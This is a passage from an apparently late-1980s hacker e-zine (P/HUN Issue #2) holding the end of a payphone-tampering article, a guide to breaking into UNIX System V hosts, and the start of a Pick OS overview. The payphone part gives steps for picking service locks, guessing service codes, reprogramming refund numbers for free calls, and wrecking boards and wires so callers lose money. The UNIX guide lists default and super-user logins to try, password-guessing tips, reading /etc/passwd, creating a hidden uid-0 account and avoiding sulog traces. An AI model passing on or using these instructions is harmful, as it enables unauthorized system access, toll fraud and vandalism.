like..... A) Change the refunds number. This is a number to get in touch with the company that operates the phone and get a refund sent to you by mail. When you dial it, you won't have to put in a quarter for the call. Now, if you can change that number to whatever you'd like, you can make a free phone call from that phone anytime you want! B) See how much money is in the coin box. You don't want to waste your time if theres only $5 in there do you?? You can also erase that amount, making it a pain in the ass for the technician who now must count it out himself! C) Theres a couple of other things in there that I haven't found out about yet but as soon as I do, they'll be in the next issue fer sure! Ok, the lock for this is either in two places. Check the top of the payphone, if theres a lock there, thats the one that you want. It's called a service lock. If it isn't there, check the right-hand side of the payphone. If it's there, you'll need that key that you've made also. Pick the top lock and use the key for the one underneath it. Once you do that, you should get one of the following.... 1 - If the payphone has a LCD Display on it, you'll see a menu displaying the following... Service Mode: Now you'll have to hack out the code. It's usually four digits so it should take too long. I'm not about to list the ones that I have because I know some asshole will wind up trashing my phones!!! Theres a few codes that are possible and each do different things. For instance, one code will give you access to the coin box counts and test modes while another will give you access to programming the emergency numbers and refund numbers. Be sure NOT to go into the payphone test mode!! This is cause the payphone to display PHONE SELF-TEST: Please Do Not Use. What happens here is that the phone calls up the company that operates the payphone and tells whoever picks up the phone, the amount that is in the coin box and whatever thats being do to the phone! You're asking for trouble with this mode. 2 - If there is no display, listen to the handset. A voice will prompt you to enter your service entry. It works exactly the same way as the LCD Display but just with a voice. 3 - Either way, once the lock is turned back into the original position, the phone will go into self-test mode. The way to get around this is to open up the phone. Just pull the front end of the phone towards you, this will release half of the phone. Find the power supply board. On some models, it will have the power supply on the main board [The one standing upright], on others, the power supply will have it's own separate board located underneath the main board and coin mech. You'll notice which ever section that has a transformer on it, thats what I'm talking about. Ok, there should be a little orange switch there. If you pull in out, that will turn the phone off. Pushing it in will turn the phone back on again. If you pull it out and then push it in again, the phone will do a quick check of itself [about 3-5 seconds]. Now, put the front end of the phone back onto the fortress and turn the service key quickly. If you do this quick enough, the phone won't have a chance to go into service mode or self-test. It'll be like you never broke into it in the first place! 6 - Once you get past the service lock. You can now get inside the payphone itself. Pull the front end of the payphone towards you, then lift. Inside you'll see various electronic boards, a coin mech, etc... On some models, you'll also have a modular cable coming in from the jack, hook up your portable phone to it and dial up! Trash the boards, take some home. Thats where the real damage comes in! The average payphone costs about $1,200 to 1,500 bucks and most of that is because of whats inside, not the fortress itself. 7 - On most payphones that are in stores, they'll be a couple of wires coming out of it. If the phone was hooked up sloppy, they'll be exposed. One wire is for power, the other goes to the jack. Cut them or pull out the jack. Everyone that puts money into it afterwards will lose it! 8 - On the Intellical and Echotel payphones, theres a special feature that will allow the owner of the phone to log into it remotely from a computer. As of now, I don't have the exact information on how to break into it through modeming but I do know that it is definately possible! Once you login, you'll be able to reprogram the rate tables. A rate table is a eprom that contains all the information on the rates for calls such as how much it costs to call long distance and the amount of time per call thats allowed. If you're able to reprogram the rate table, you'll be able to make free phone calls anywhere for an unlimited amount of time. As soon as I figure out how to crack the program thats used to call in, I'll write the information in the next issue. Stay tuned! Well, that should be enough for all you guyz to have fun. The next issue will have a detailed explanation on how the payphone itself operates and whatever else I might find out that interesting. Until then, if you have any questions, you can leave me some email. ---===>>THE JEDI<<===--- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = Volume 1 , P/HUN Issue #2 , Phile #6 of 9 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= /|X/|X/|X/|X/|X/|X/|X/|X/|X/|X/|X/|X/|X/|X/|X/|X/|X/|X/|X/|X X|/ X|/ /|X /|X X|/ An Indepth Guide in Hacking UNIX and the X|/ /|X concept of Basic Networking Utility /|X X|/ ---------------------------------------- X|/ /|X By:Red Knight /|X X|/ Phreakers/Hackers Underground Network X|/ /|X /|X X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/ Brief history on UNIX ---------------------- Its because of Ken Tompson that today were able to Hack Unix.He used to work for Bell Labs in the 60s.Tompson started out using the MULTICS OS which was later eliminated and Tompson was left without an operating system to work with. Tompson had to come up with something real quick.He did some research and and in 1969 UNIX came out,which was a single user and it didn't have many capabilities.A combined effort with others he rewrote the version in C and added some good features.This version was out in 1973 and was available to the public.This was the first begining of UNIX as its known presently.The more refined version of UNIX,today know as UNIX system V developed by Berkley University has unique capabilities. Various types of UNIXes are CPIX,Berkeley Ver 4.1,Berkeley 4.2,FOS,Genix,HP-UX, IS/I,OSx,PC-IX,PERPOS,Sys3,Ultrix,Zeus,Xenix,UNITY,VENIX,UTS,Unisys,Uniplus+, UNOS,Idris,QNIX,Coherent,Cromix,System III,System 7,Sixth edition. The article it self: -------------------- I believe that hacking into any system requires knowledge of the Operating system itself.Basically what I will try to do is make you more familiar with UNIX operation ,its usefull commands that will be advantageous to you as a hacker.This article contains in depth explainations. Error Messages that one may came across:[UNIX system V] ---------------------------------------- Login incorrect - An ivalid ID and/or pw was entered.This means nothing. In UNIX there is no way guessing valid user IDs.You may come across this one when trying to get in. No more logins - will happens when the system wont accept anymore logins could be going down Unknown Id - will happen if an ivalid id is entered using (su) command Unexpected eof in file - The file being stripped file has been damaged Your password has expired - This is quiet rare although there have been cases where it happened.Reading the etc/passwd will show you at how many intervals it changes. You may not change the password - The password has not yet aged enough.The Administrator set the quotas for the users Unknown group [groups name] - occurs when chgrp is executed ,group doesn't exist Sorry - Indicated that you have typed in an invalid super user password(execu- tion of the su) Permission denied!- Indicated you must be the owner or a super user to change password. Sorry <[# of weeks] since last change - This will happen when password has has not aged enough and you tried to change it(passwd) [directory name]:no permission - You are trying to remove a directory which you have no permission to. [file name] not removed - trying to delete a file owned by another user that you dont have write pemision for. [dirname] not removed - ownership of the dir is not your that your trying to delete. [dirname] not empty - the directory contains files so you must have to delete the files before executing the rmdir [command] not found - you have entered an ivalid command not know to UNIX cant execute pwd - some thing wrong with the system cant execute pwd command cannot chdir to .. - (.. one level up) permision is required to execute pwd above the current directory cant open [file name] - defined wrong path,file name or you have no read permission cp:[file name] and [file name] are identical - self explanatory cannot locate parent directory - occurs when using mv [file name] not found - file which your trying to move doesn't exsist You have mail - Self explanatory Basic Networking Utility error messages --------------------------------------- cu:not found - networking not installed login failed - invalid id/pw or wrong # specified dial failed - the systen never answered due to a wrong # uucp completely failed - did not specify file after -s wrong time to call - you called at the time at a time not specified in the Systems file system not in systems - you called a remote not in the systems file Logon format : first thing one must do is switch to lower case -------------- Identifing a UNIX.Here is what you'll see: Some times there will be no system identifer AT&T UNIX SysVR3.0 (eg of a system identifier) login: or Login: Any of these is a UNIX.Here is where you will have to guess at a user valid id.Here are some that I have come across eg( glr,glt,radgo,rml,chester,cat, lom,cora,hlto,hwill,edcasey and also some containing numbers smith1,mitu6 or special characters in it like bremer$,j#fox.Login names have to be 3 to 8 chracters in lenght lowercase and must start with a letter.In some XENIX systems one may login as "guest" User level accounts:(lower case) -------------------- In Unix they have whats called accounts .These accounts can be used at the "login:" prompt. Here is a list: sys bin trouble daemon uucp nuucp rje lp adm listen - if starlan is installed Super-user accounts: -------------------- And then there are super-user login which make UNIX worth hacking. The accounts are used for a specific job. In large systems these logins are assingned to users who have a responsibilty to maintain subsystems. They are as follows :(all lower case) root - this is a must the system comes configured with it.It has no restriction.Has power over every other account. unmountsys - unmounts files setup - system set up makefsys - makes a new file sysadm - allows useful S.A commands(doesn't need root login) powerdown - powering system down mountfsys - mounts files checkfsys - checks file These accounts will definitly have passwords assigned to them.These accounts are also commands used by the system administrator. Here are some examples of accounts I have seen: cron uuhelp usenet anonuccp news network bellboy lp vector guest games ninja vote warble sysinfo After the login prompt you will receive a password prompt: password: or Password: Enter the password (it wont echo).The password rule is as follows:Each pw has to contain at least 6 characters and maximum has to be 8 .Two of which are to be alphabetic letters and at least one being a number or a special character The alphabetic digits could be in upper case or lower case.Here are some of the passwords that I have seen (eg.Ansuya1,PLAT00N6,uFo/78,ShAsHi..,Div417co) The passwords for the super user accounts will be difficult to hack try the accounts interchangebly eg.login:sysadm password:makefsys or rje1, sysop,sysop1,bin4 or they might contain letter,numbers,special chracters in them.It could be anything.The user passwords are changed by an aging proccess at successive intervals.The users are forced to changed it.The super-user will pick a password that wont need changing for a long period of time. You have made it! ----------------- The hard part is over and hopefully you have hacked a super-user account. Remember Control-d stops a process and also logs you off. The next thing you'll probably see is the system news eg. login:john password:hacker1 System news There will be no networking offered to the users till august 15,due to hardware problems. (just an example) $ $ is the Unix prompt -waiting for a command to be entered.I will use this throught the article to show outouts etc..(Its not part of the command) # - means your logged in as root(very good) A word about the XENIX System III:(run on the tandy 6000) --------------------------------- The largest weakness in the XENIX System III occurs after the installation of the Profile-16 or more commonly know as the filepro-16.I have seen the filepro-16 installed in many systems. The installation process creates an entry in the password file for a user named XfBprofileXfR ,an account that who owns and administors the database. The great thing about it is that when the account is created ,no password is assigned to it.The database contains executable to maintain it.The database creation programs perform a XfBsetuidXfR to boot up the XfBootXfR there by giving a person the whole C Shell to gain Super User privilege same as root. Intresting huh! * Note: First the article will inform you of how the Unix is made up The Unix is made if three components-The shell,the kernal,file system. The kernal: ----------- You could say that the kernal is the heart of the Unix operating system. The kernal is a low level language lower than the shell which maintains processes .The kernal handles memory usage ,maintains file system the sofware and hardware devices. The shell: ---------- The shell a higher level language. The shell had two important uses, to act as command interpreture for example using commands like cat,who, ls the the shell is at work figuring out whether you have entered a command correctly or not.The second most important reason for the shell is its ability to be used as programing language.Suppose your performing some tasks repeatedly over and over again,You can program the shell to do this for you. The file system: --------------- The file system in Unix is divede into 3 catagories:Directories,ordinary files and special files.(d,-) Basic stucture: (/)-this is abreviation for the root dirctory. root level root (/) system -------------------------------------|----------------------------------level | | | | | | | | /unix /etc /dev /tmp /lib /usr /usr2 /bin | _____|_____ login passwd | | | level /john /cathy ________________________|_______________ | | | | | | .profile /mail /pers /games /bin /michelle *.profile - in case | __|______ | __|_______ you wich to change your enviroment capital | | data | | but after you log off.It sets to othello starwars letter letter1 default. the /unix-is the kernal /etc - contains system administrators files,Most are not available to the regular user.(this directory contains the /passwd file) Here are some files under /etc directory: /etc/passwd /etc/utmp /etc/adm/sulog /etc/motd /etc/group /etc/conf /etc/profile /dev - contains files for physical devices such as printer and the disk drives /tmp - temporary file directory /lib - dirctory that contains programs for high level languages /usr - this directory contains dirctories for each user on the system Eg. of a list of files under /usr /usr/tmp /usr/lib /usr/docs /usr/news /usr/spool /usr/spool/lp /usr/lib/uucp /bin - contain executable programs (commands) The root also contains: /bck - used to mount a back up file system. /install - Used to install and remove utilities /lost+found - This is where all the removed files go,This dir is used by fsck (1M) /save -A utility used to save data /mnt - Used for temporary mounting **Now the fun part scouting around** Local commands (Explained in details) ------------------------------------- At the unix prompt type the pwd command-it will show you the current working directory you are in. $ pwd $ /usr/admin - assuming that you have hacked into a super user acc checkfsys $ This gives you the full login directory.The / before tell you the location of the root directory or (REFER TO THE DIAGRAM ABOVE) $ pwd $ /usr/john $ Assuming you have hacked into johns acc. Now lets say you wanted to move down to the michelle directory( you own this) that contains letters.You would type in $ cd michelle or cd usr/john/michelle $ pwd $ /usr/john/michelle $ Going back one directory up type in: $ cd .. or going to your parent directory just type in "cd" Listing file directories assuming you are in the parent directory: $ ls /usr/john mail pers games bin michelle This wont give you the .profile file .To view it type $ cd $ ls -a : : .profile To list file names in michelles directory type in: $ ls michelle (that if your in the johns directory) $ ls /usr/john/michelle(parent dir) ls -l ----- The ls -l is an an important command in unix.This command displays the whole directory in long format :Run this in parent directory $ ls -l total 60 -rwxr-x--- 5 john bluebox 10 april 9 7:04 mail drwx------ 7 john bluebox 30 april 2 4:09 pers : : : : : : : : : : : : : : -rwxr-x--- 6 cathy bluebox 13 april 1 13:00 partys : : : : : : : $ The total 60 tells one the ammount of disk space used in a directory.The -rwxr-x--- is read in triples of 3.The first chracter eg(-,d,b,c)-means as follows: - is an ordinary file ,d is a directory,b is block file,c is a chracter file. The r stands for read permission,w is write permission,x is execute.The first colum is read in 3 triples as stated above.The first group of 3 (in -rwxr-x---) after the "-" specifies the permission for the owner of the file,the second triple are for the groups (the fourth colum) and the last triple are the permissions for all other users.Therefore the -rwxr-x--- is read as follows. The owner john has permission to read,write and execute anything in the bin directory but the group has no write permission to it and the rest of the users have no permission at all.The format of one of the lines in the above output is as follows: file type-permissions,links,usersname,group,bytes taken,date,time when last renued,directory or file name. **You will be able to read,execute cathys file named party due to the same group*** chmod ----- The chmod command changes permission of a directory or a file.Format is chmod who+,-,=r,w,x The who is substituted by u-user,g-group,o-other users,a-all. The + means add permission,- means remove permission,= - assign. Example :If you wanted all other users to read the file name mail ,type: $ chmod o+r mail cat --- Now suppose you wanted to read the file letter .There are teo ways to doing this.First go to the michelle directory then type in: $ cat letter line one ...X line two ... the output of letter line three../ $ or If you are in the parent directory type in: $ cat /usr/john/michelle/letter and you will have the same output. Some cat options are -s,-u,-v,-e,-t Special Chracters in Unix: ------------------------- * - matches any number of single characters eg. ls john* will list all files that begin with john [...] - matchs any one of the chracter in the [ ] ? - matches any single chracter & - runs a process in the backgroung leaving your terminal free $ - Values used for variables also $n - null argument > - redirectes output < - redirects input to come from a file >> - redirects command to be added to the end of a file | - pipe output (eg:who|wc-l tells us how many users are online) "..." - Turn of meaning of special chracters excluding $, ... - allows command output in to be used in a command line '...' - turns of special meaning of all chracters continuation of local commands...[ ] -contains the options used ------------------------------- passwd ------ Password changing seems to be a big thing among the savants.Anyway to change the password one would use the 'passwd' command as shown below: $passwd Changing password for john Old password: New password: Retype new password: $ This will only work when the password has aged enough ps -- Its sometimes necessary to see what command procesess you are running,this command lets you see that. ps [-a all processes except group leaders] [-e all processes] [-f the whole list] $ps PID TTY TIME COMMAND 200 tty09 14:20 ps The systems reports (PID - process idenetification number which is a # from 1-30,000 assigned to UNIX processes) It also reports the TTY,TIME and the COMMAND being executed at the time. To stop a process enter : $kill [PID] (this case its 200) 200 terminated $ grep ---- This comand is important when seaching for a word or words in large files. grep [argument] [file name] - searchs for an file that contains the argument for example: $ grep phone cathy phone michelle (718)5551234 phone cindy (718)5553456 What this did was to find the argument 'phone' in the file cathy.If the argument consists of two or more words then it must be enclosed in single quotes. mv -- mv [file names(s)] [ dir name ] - renames a file or moves it to another directory eg. $mv letter letters $ This renames the file letter to letters thereby deleting letter or if you want to move files then $mv /usr/john/pers/capital /usr/john/michelle/capital $ This moves the file capital to the directory named michelle diff ---- diff [file name] [ file name] - show diffrence between two files.Output of this will have something like 4,5c4,5 then the it will display both sets of files on the screen The 4,5c4,5 means that you must change "c" lines 4 to 5 in one file to line 4 to 5 in another. Option for using this command are : -b - it ignores blank spaces -h - compares it quickly -s - reports files that are the same -S[file] - this is when you want to compare a directory starting at a specific file There is also a command to compare 3 files which is : diff3 [options] [file1] [file2] [file3] cp -- cp [file name] [file name] - makes a copy of a file $ cp letter letters $ The file letters is a dupilcate copy of letter.In this case the original is not erased like in the mv command .... more UNIX commands: -------------------- man [command] or [c/r] -will give you a list of commands explainations help - available on some UNIX systems mkdir [dir name(s)] - makes a directory rmdir [dir name(s)] - removes directory.You wont be able to remove the directory if it contains files in them rm [file name(s)] - removes files. rm * will erase all files in the current dir.Be carefull you!!.Some options are : [-f unconditional removal] [-i Prompts user for y or n] write [login name ] - to write to other logged in users.Sort of a chat mesg [-n] [-y] - doesn't allow others to send you messages using the write command.Wall used by system adm overrides it. $ [file name] - to execute any file wc [file name] - Counts words,chracters,lines in a file stty [modes] - Set terminal I/O for the current devices sort [filename] - Sorts and merges files many options spell [file name] > [file name] - The second file is where the misspelt words are entered date [+%m%d%y*] [+%H%%M%S] - Displays date acoording to options at [-r] [-l] [job] - Does a specified job at a specified time.The -r Removes all previously scheduled jobs.The -l reports the job # and status of all jobs scheduled write [login] [tty] - Sends message to the login name.Chat! su [login name] --------------- The su command allows one to switch user to a super user to a user.Very important could be used to switch to super user accounts. Usage: $ su sysadm password: This su command will be monitored in /usr/adm/sulog and this file of all files is carefully monitered by the system administrator.Suppose you hacked in johns account and then switched to the sysadm account (ABOVE) your /usr/adm/sulog entry would look like: SU 04/19/88 21:00 + tty 12 john-sysadm Therfore the S.A(system administrator) would know that john swithed to sysadm account on 4/19/88 at 21:00 hours Searching for valid login names: ------------------------------- Type in- $ who ( command informs the user of other users on the system) cathy tty1 april 19 2:30 john tty2 april 19 2:19 dipal tty3 april 19 2:31 : : tty is the users terminal,date,time each logged on.dipal,john are valid logins. Files worth concatenating(cat) /etc/passwd file: ----------------- The etc/passwd is a vital file to cat.For it contains login names of all users including super user accounts and there passwords.In the newer SVR3 releases they are tighting their security by moving the encrypted passwords from /etc/passwd to /etc/shadow making it only readable by root. This is optional offcourse. $ cat /etc/passwd root:D943/sys34:0:1:0000:/: sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh : other super user accs. : john:chips11:34:3:john scezerend:/usr/john: : other users : $ If you have reached this far capture this file as soon as posible. This is a typical output etc/passwd file.The entries are seperated by a ":".There made be up to 7 fields in each line. Eg.sysadm account. The first is the login name in this case sysadm.The second field contains the password.The third field contains the user id."0 is the root".Then comes the group id then the account which contains the user full name etc .The sixth field is the login directory defines the full path name of the the particlar account and the last is the program to be executed. Now one can switch to other super user account using su command descibed above. The password entry in the field of the checkfsys account in the above example is "Locked;". This doesn't mean thats its a password but the account checkfsys cannot be accessed remotely.The ";" acts as an unused encryption chracter.A space is also used for the same purpose.You will find this in many UNIX systems that are small systems where the system administrator handles all maintaince. Password aging: --------------- If password aging is active the user is forced to change the password at regular intervals.One may be able to tell just by looking at the /etc/passwd file when the password is allowed to be changed and when it is compulsory to change it. For example the entry: john:chips11,43:34:3:John Scezerend:/usr/john: The password contains an extension of (,43) which mean that john can change has to change the password atleast evert 6 weeks and can keep it for atleast 3 week.The format used is [password],Mmww.The M is the maxiumum number of weeks password has to be change and m is the minimum interval password can be changed and the ww is indicates when the password was last changed. Aging chart: ---------|----------- Character|# of weeks . | 0 / | 1 0-9 | 2-11 A-Z | 12-37 a-z | 38-63 ---------|----------- >From the above anyone can determine the number of weeks one can chnage the password. The (ww) is automatically added as to when the password was last changed . IF SHAWDOWING IS ACTIVE: ------------------------ If the shawdowing is active the /etc/passwd would look like this: root:x:0:1:0000:/: sysadm:x:0:0:administration:/usr/admin:/bin/rsh The password filed is substituted by "x". The /etc/shawdow file only readable by root will look similar to this: root:D943/sys34:5288:: : super user accounts : Cathy:masai1:5055:7:120 : all other users : The first field contains users id:the second contains the password(The pw will be NONE if logining in remotely is deactivated):the third contains a code of when the password was last changed:the fourth and the fifth contains the minimum and the maximum numbers of days for pw changes(Its rare that you will find this in the super user logins due to there hard to guess passwords) /etc/options directory ----------------------- The etc/options dir will consists of utilities available in the system. Example: -rwxr-xr-x 1 root sys 40 april 1:00 uucp.name uucp standing for BNU /etc/group ----------- The file has each group on the system.Each line will have 4 entries separated by a ":" . Example of concatenated /etc/group: root::0:root adm::2:adm,root bluebox::70: Group name:password:group id:login names ** It very unlikely that groups will have passwords assigned to them ** The id "0" is assigned to / Sending and recieving messages: ------------------------------- Two programs are used to manage this.They are mail & mailx.The difference between them is that mailx is more fancier thereby giving you many choices like replying message ,using editors etc. Sending: -------- The basic format for using this command is: $mail [login(s)] (now one would enter the text after finishing enter "." a period on the next blank line) $ This command is also used to send mail to remote systems.Suppose you wanted to send mail to john on a remote called ATT01 you would type in: $mail ATT01!john Mail can be sent to several users,just by entering more login name after issuing the mail command Using mailx is the same format:(This I'll describe very briefly) $mailx john subject:(this lets you enter the subject) (line #1) (line #2) (After you finish enter (D.) not the brackets offcourse ,more commands are available like Dp,Dr,Dv,Dm,Dh,Db etc.) Receiving: ---------- After you log on to the system you will the account may have mail waiting. You will be notified "you have mail". To read this enter: $mail (line #1) (line #2) (line #3) ? $ After the message you will be prompted with a question mark.Here you have a choice to delete it by entering d,saving it to view it later s,or just press enter to view the next message. (DONT BE A SAVANT AND DELETE THE POOR GUYS MAIL) Super user commands: -------------------- $sysadm adduser - will take you through a routine to add a user (may not last long) Enter this: $ sysadm adduser password: (this is what you will see) /--------------------------------------------------------------------------X Process running succommmand adduser USER MANAGMENT Anytime you want to quit, type "q". If you are not sure how to answer any prompt, type "?" for help If a default appears in the question,press <RETURN> for the default. Enter users full name [?,q]: (enter the name you want) Enter users login ID [?,q]:(the id you want to use) Enter users ID number (default 50000) [?,q) [?,q]:( press return ) Enter group ID number or group name:(any name from /etc/group) Enter users login home directory:(enter /usr/name) This is the information for the new login: Users name: (name) login ID:(id) users ID:50000 group ID or name: home directory:/usr/name Do you want to install,edit,skip [i,e,s,q]? (enter your choice if "i" then) Login installed Do you want to give the user a password?[y,n] (its better to enter one) New password: Re-enter password: Do you want to add another login? X----------------------------------------------------------------------------/ This is the proccess to add a user.Since you hacked into a super user account you can make a super user account by doing the following by entering 0 as an user and a group ID and enter the home directory as /usr/admin.This will give you as much access as the account sysadm **Caution** - Do not use login names like Hacker,Cracker,Phreak etc .This is a total give away. The process of adding a user wont last very long the S.A will know when he checks out the /etc/passwd file $sysadm moduser - This utility allows one to modify users.DO NOT ABUSE!!! Password: This is what you'll see: /----------------------------------------------------------------------------X MODIFYING USER'S LOGIN 1)chgloginid (This is to change the login ID) 2)chgpassword (Changing password) 3)chgshell (Changing directory DEFAULT = /bin/sh) ENTER A NUMBER,NAME,INITIAL PART OF OF NAME,OR ? OR <NUMBER>? FOR HELP, Q TO QUIT ? X----------------------------------------------------------------------------/ Try every one of them out.Do not change someones password.It creates a havoc. If you do decide to change it.Please write the original one down somewhere and change back.Try not to leave to many traces after you had your fun. In choice number 1 you will be asked for the login and then the new one. In choice number 2 you will asked for the login and then supplied by it correct password and enter a new one. In choice 3 this is used to a pchange the login shell ** Use full ** The above utilites can be used separatly for eg( To change a password one coulfd enter: $sysadm chgpasswd not chapassword ,The rest are same) $sysadm deluser - This is an obviously to delete a user password: This will be the screen output: /---------------------------------------------------------------------------X Running subcommand 'deluser' from menu 'usermgmt' USER MANAGEMENT This fuction completely removes the user,their mail file,home directory and all files below their home directory from the machine. Enter login ID you wish to remove[q]: (eg.cathy) 'cathy' belongs to 'Cathy Franklin' whose home directory is /usr/cathy Do you want to remove this login ID 'cathy' ? [y,n,?,q] : /usr/cathy and all files under it have been deleted. Enter login ID you wish to remove [q]: X--------------------------------------------------------------------------/ This command deletes everthing owned by the user.Dont use it even if you have access to it. other super user commands: -------------------------- wall [text] control-d - to send an anouncement to users logged in(will override mesg -n command).Execute only from / /etc/newgrp - is used to become a member of a group sysadm [program name] delgroup - delets groups whoson - self explanatory lsgroup - Lists group mklineset -hunts various sequences lsuser -lists all the users & their logins names Other commands may require file system to be mounted. Basic Networking utility(BNU) ----------------------------- The BNU is a unique feature in UNIX.Some systems may not have this installed. What BNU does is allow other remote UNIXes communicate with yours without logging off the present one.BNU also allowes file transfer between computers. Most UNIX systems V will have this feature installed. The user program like cu,uux etc are located in the /usr/bin directory Basic Networking Files: ----------------------- /usr/lib/uucp/[file name] [file name] systems - cu command to establishes link.Contains info on remote computers name,time it can be reached,login Id,password,telephone numbers devices - inter connected with systems files(Automatic call unit same in two entries)also cantains baud rate,port tty1 etc. dialers - where asscii converation must be made before file tranfers etc. dialcodes - contains abreiviations for phone numbers that can be used in systems file other files are sysfiles,permissions,poll,devconfig B.N.U Aministrative files: -------------------------- There are 5 admnistrative files present.These are files are created in the /usr/spool directory .These A.Files are responsible for various BNU procceses like kepping records data ,files tranfers bettwenn remote and local and also usefull to lock devices. TM - This file used to hold temporary data .When tranfering the files from a remote to local the /usr/spool/uucp/[name of the remote computer ] creates this in the format of as of below: TM[Process Identification Number].[ddd] The ddd is the a 3 digit number (sequential) starting with "0" Here a typical eg: TM322.012 Then this file is moved into the path defined by the C.sysnxxx file X.[Execute files] - Created in the /usr/spool before you execute the commands in remote. The format used to name this file is X.sysnxxx where sys stand for the remote name and n is the priority level the xxxx is a sequence assingned by the uucp.These files always contain the Name of the file ,Comuter & file name to recieve,Persons login & computer name and the command string. LCK - The lock file created in the /usr/spool/locks directory.The is used when devices are being used.Prevent usage of the same calling device. Format used: LCK.str wher the str is a device name.The Lock file contains the PID needed to lock C.sysnxxx - created in the usr/spool directory.These are the work files.Used when work is in line,remote execeutions.Format is same as the X.sysnxxxx.The works files contain the full path name of the file to be sent,path name of the destination (TM Transfers),Remote login name to be notified after the file transmision is complete,Users login name and the name of the programs used eg.uucp,uupick etc. D - The data files.Format used is D.systmxxxxyyy.These files are created when specified in a command to copy to the spool directory.Eg. By the usage of uucp -C this will be true. The systm is the remote name,xxxx is the the 4 digits seq assingned by the uucp.The yyy is a sub sequence number. Logining on to remote and sending+receiving files ------------------------------------------------- cu - This command allows one to log on to the local as well as the remote Unix (or a non unix)without haveing to hang up so you can transfer files. Usage:[options] $ cu [-s baud rate][-o odd parity][-e even parity][-l name of comm line] telephone number | systemname To view system names that you can communicate with use the 'unname' command: Eg. of output of names: ATT01 ATT02 ATT03 ATT04 $ cu -s300 3=9872344 (9872344 is the tel#) connected login: password: local strings: -------------- <D.> - will log you off the remote terminal but not the local D! - out you on the local withiout disconnecting the line from remote <control-d> - puts you back on the remote unix D%take [file name] - takes a copy of the file name and copies it to the local(the directory which you are in) "%put [file name] - reverse of above D$[command] - allows the execution of a command to the local from remote ct -- ct allows local to connect to remote.Initiates a getty on a remote terminal. Usefull when using a remote terminal.BNU has call back feature that allows the user on the remote who can execute a call back meaning the local can call the remote.[ ] are options $ ct [-h prevent automatic hang up][-s bps rate][-wt set a time to call back abbrieviated t mins] telephone number uux --- To execute commands on a remote (unix to unix) usage:[ ] are options $ uux [- use standard output][-n prevent mail notification][-p also use standard output] command-string uucp ---- uucp copies files from ones computer to the home directory of a user in remote system.This also works when copying files from one directory to another in the remote.The remote user will be notified by mail. This command becomes use full when copying files from a remote to your local system. The uucp requires the uucico daemon will call up the remote and will perform file login sequence,file transfer and notify the user by mail. Daemons are programs runining in the background.The 3 daemons in a Unix are uucico,uusched,uuxqt. Daemons Explained:[nows a good time to explain the 3 daemons] ------------------ uuxqt - Remote execution.This daemon is executed by uudemon.hour started by cron.UUXQT searchs in the spool directory for executable file named X.file sent from the remote system.When it finds a file X.file where it obtains process which are to be executed.The next step is to find weather the processes are available at the time.The if available it checks permission and if everthing is o.k it proceeds the background proccess. uucico - This Daemon is very immportant for it is responsible in establishing a connection to the remote also checks permission,performs login procedures,transfers + executes files and also notifies the user by mail.This daemon is called upon by uucp,uuto,uux commands. uusched - This is executed by the shell script called uudemon.hour This daemons acts as a randomizer before the UUCICO daemon is called. Usage of uucp command: $ uucp [options] [first full path name!] file [destination path!] file example: $ uucp -m -s bbss hackers unix2!/usr/todd/hackers What this would do is send the file hackers from your computer to the remotes /usr/todd/hackers making hackers offcourse as file.todd would mail that a file has been sent to him.The unix2 is the name of the remote. Options for uucp:(Dont forget to type in remotes name unix2 in case) -c dont copy files to spool directory -C copy to spool -s[file name] - this file will contain the file status(above is bbss) -r Dont start the comm program(uucico) yet -j print job number(for above eg.unix2e9o3) -m send mail when file file is complete Now suppose you wanted to receive file called kenya which is in the usr/dan/usa to your home directory /usr/john assuming that the local systems name is ATT01 and you are currently working in /usr/dan/usa,you would type in: $uucp kenya ATT01!/usr/john/kenya uuto ---- The uuto command allows one to send file to remote user and can also be used to send files locally. Usage: $ uuto [file name] [system!login name]( omit systen name if local) Conclusion: ----------- Theres always more one can say about the UNIX but its time to stop. I hope you have enjoyed the article.I apologize for the lenght. I hope I made the UNIX operating system more familiar. Remember do not abuse any systems you hack into for a true hacker doesn't like to reck but to learn. I can be reached at (718)358/9209 - Hackers Den88 [2600 BBS #5] Watch for my new article on using PANAMAC airline computers coming soon. Red Knight P/HUN! <<T.S.A.N>> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = Volume 1 , P/HUN Issue #2 , Phile #7 of 9 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Guide to The Pick Operating System ---------------------------------- Mr. Slippery Phreakers/Hackers Underground Network (c) ------------- Introduction: ------------- This is an unfamiliar operating system to many in spite of its being wide spread. It was created by Dick Pick (no kidding) a number of years ago and can now be found on everything from IBM PC's through mainframes. One reason it is unfamiliar is that it has been sold under a number of names such as Mentor, Ultimate and Reality. It resembles a data base management system and is also sold as a DBMS on top of MSDOS as Revelation, as well as running as an application on UNIX and VM/CMS. Its also unfamiliar to many since its basically sold to do business functions like accounting in small to medium size businesses and is therefore less likely to be found by people such as those reading this article :-) This is a bare-bones introduction to the system. It does not include details on the languages nor specific system manager functions such as how to stop and restart the system. Also, there is a new version out, open access, that I don't know anything about. Its supposed to allow for easier integration of Pick with other operating systems, such as UNIX. -------------------- Structure of System: -------------------- Everything outside of the basic operating system (ABS for absolute addresses) is based on items in files. Even files are items in other files. The system is laid out in a four level hierarchy: ---------- - SYSTEM - (user accounts) ---------- / | X / | X ------------- -------- --------- - Master- -M/DICT- - MD - (synonyms for user) - Dictionary- - - - - (account level ) ------------- -------- --------- / / | X X / / | X X ---------- ------------ --------- - DICT - - File - - - - - -Dictionary- - - ---------- ------------ --------- / / | X X / / | X X -------- -------- ------- - DATA - - File - - - - - - Data - - - -------- -------- ------- The System Dictionary (SYSTEM) is a file that contains the user accounts and passwords. It points to the user's master dictionary which contains pointers to the dictionary parts of the user's files and also has commands (VERBS), dictionary defining items and procedures (PROCS). The data files are divided into two pieces the dictionary which points to the data portion and contains items that can be used to retrieve items from the data portion of the file. The 